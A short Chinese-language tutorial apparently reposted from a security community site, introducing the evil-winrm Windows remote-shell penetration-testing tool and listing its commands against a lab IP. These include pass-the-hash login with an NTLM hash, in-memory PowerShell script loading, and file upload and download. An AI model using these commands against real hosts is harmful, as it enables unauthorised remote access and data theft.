Windows渗透工具-evil-winrm

silenceismine2024-03-21文章来源:SecHub网络安全社区


evil-winrm介绍

用于渗透测试的终极Windows远程管理shell

此程序可以在启用了此功能的任何Microsoft Windows Server上使用(通常在端口5985上),当然只有在您具有使用它的凭据和权限的情况下。

下载

https: //github.com/Hackplayers/evil-winrm

使用

1.使用纯文本密码登录

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

2.使用纯文本密码登录 - 启用 SSL

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

3.使用 NTLM Hash 登录

-通过哈希攻击 (在内网渗透或解决任何与 Windows 权限提升和 Active Directory 利用相关的项目中,我们经常通过各种攻击方法获得 NTLM 哈希值)

evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

4.使用 Evil-winrm 存储日志

(此功能表示在获取远程会话后,将执行命令的日志保存到我们的本地系统中。 我们在平时做项目时,都需要攻击凭据,以便进行后续报告输出)

evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l

5.加载 Powershell 脚本

(可以直接将脚本加载到内存中 ,我们可以使用带有-s 参数接目标系统的powershell脚本的相对路径 )

6.运行可执行文件

(能够在 evil-winrm 会话中运行 exe 可执行文件)

7.使用 Evil-winrm 进行文件传输

上传文件

upload 路径

下载文件

download 文件名 路径

8.从 Docker 使用 Evil-winrm

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'